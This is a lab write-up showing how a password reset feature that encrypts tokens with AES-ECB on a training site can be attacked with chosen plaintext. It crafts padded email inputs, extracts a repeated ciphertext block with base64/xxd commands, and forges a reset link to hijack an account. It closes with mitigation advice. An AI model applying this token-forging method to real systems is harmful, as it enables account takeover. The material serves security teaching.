Overview
This write-up demonstrates a known-plaintext attack against AES-ECB within a controlled lab environment. It showcases how predictable password reset codes in ECB mode can be exploited to forge valid tokens and hijack accounts. The key objective of this lab is to highlight how misuse of ECB mode in sensitive operations—like password resets—can lead to account takeover vulnerabilities.
When the attacker knows the plaintext into an encryption function, check for ECB mode.
https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)
How do you check for ECB mode? Encrypt the same thing twice and see if you get the same result. It could either be ECB or CBC with a static IV.
If it’s ECB, we don’t know the block size, but it’s probably 4 or 8 or 16. 16 will work for 4, 8 or 16, so we will choose 16.
Detection of ECB Encryption
During testing, we noticed that issuing two identical password reset requests produced the same encryption output, indicating the use of ECB mode (rather than CBC with dynamic IVs).
The below password reset URL is sent to the user:
http://topup.webhacklab.com/Account/ResetPassword?code=wMqyg+/MFhTlqxvzKPqzILBw+4u66jNHQ13Q0Kd0Ya8=&userId=427393c1-18dd-40d0-a33b-f96cc16f40d7
The user submits a SECOND forgot password request. The below reset URL is sent to the user:
http://topup.webhacklab.com/Account/ResetPassword?code=wMqyg+/MFhTlqxvzKPqzILBw+4u66jNHQ13Q0Kd0Ya8=&userId=427393c1-18dd-40d0-a33b-f96cc16f40d7
It is the SAME. ECB may be in use here.
Chosen Plaintext Technique
To isolate a reusable ciphertext block for the target account “SVL,” we crafted two distinct inputs:
bbbbbbbbSVL@whatever.comaaaaaaaaSVL@whatever.com
Reset for aaaaaaaaSVL
http://topup.webhacklab.com/Account/ResetPassword?code=+vheISv88Uo85l4reA7D+MDKsoPvzBYU5asb8yj6syCwcPuLuuozR0Nd0NCndGGv&userId=3c07f13e-5cce-4b6c-a0a1-f10683fc700e
Reset for bbbbbbbbSVL
http://topup.webhacklab.com/Account/ResetPassword?code=6cD0nQOLXoX5XlJubw3SIMDKsoPvzBYU5asb8yj6syCwcPuLuuozR0Nd0NCndGGv&userId=8b989ccb-7cc5-4b33-b7f4-887171d65b0b
Ciphertext Analysis
Both reset codes were base64-decoded and converted to hex using: echo | base64 -d | xxd -p
| User | Ciphertext | echo <ciphertext> |base64 -d | xxd -p |
| aaaaaaaaSVL | +vheISv88Uo85l4reA7D+MDKsoPvzBYU5asb8yj6syCwcPuLuuozR0Nd0NCndGGv | faf85e212bfcf14a3ce65e2b780ec3f8c0cab283efcc1614e5ab1bf328fa b320b070fb8bbaea3347435dd0d0a77461af |
| bbbbbbbbSVL | 6cD0nQOLXoX5XlJubw3SIMDKsoPvzBYU5asb8yj6syCwcPuLuuozR0Nd0NCndGGv | e9c0f49d038b5e85f95e526e6f0dd220c0cab283efcc1614e5ab1bf328fa b320b070fb8bbaea3347435dd0d0a77461af |
We put the two ciphertexts side by side and look for the duplicate segment. That is the reset code we need for the target user SVL@whatever.com!
faf85e212bfcf14a3ce65e2b780ec3f8 c0cab283efcc1614e5ab1bf328fab320b070fb8bbaea3347435dd0d0a77461af
e9c0f49d038b5e85f95e526e6f0dd220 c0cab283efcc1614e5ab1bf328fab320b070fb8bbaea3347435dd0d0a77461af
Forged a Password Reset Token
We converted that common ciphertext block back to raw bytes and base64-encoded it.echo <ciphertext> | xxd -p -r | base64
Finally, we embedded this crafted token into a reset URL for the “SVL” user, successfully generating a valid password reset link capable of hijacking the account.
http://topup.webhacklab.com/Account/ResetPassword?code=wMqyg+/MFhTlqxvzKPqzILBw+4u66jNHQ13Q0Kd0Ya8=&userId=3bdfd5f1-d17f-4990-a30b-9e83ac5af526
Mitigation Recommendations
Even though this scenario occurs in a lab, the techniques mimic serious real-world risks. To safeguard production systems:
- Avoid ECB Mode: Never use ECB for sensitive operations—prefer CBC with randomized IVs, GCM, or other secure authenticated encryption modes.
- Incorporate Nonces and Timestamps: Embed dynamic data (e.g., per-request nonces or timestamps) in reset tokens to discourage reuse and token forgery.
- Use HMAC or Authenticated Encryption: Sign tokens cryptographically to ensure integrity and prevent tampering.
- Rate-Limit and Monitor: Apply rate limiting and monitoring to password reset endpoints to detect anomalous token behavior.
- Follow Password Reset Best Practices: https://www.troyhunt.com/everything-you-ever-wanted-to-know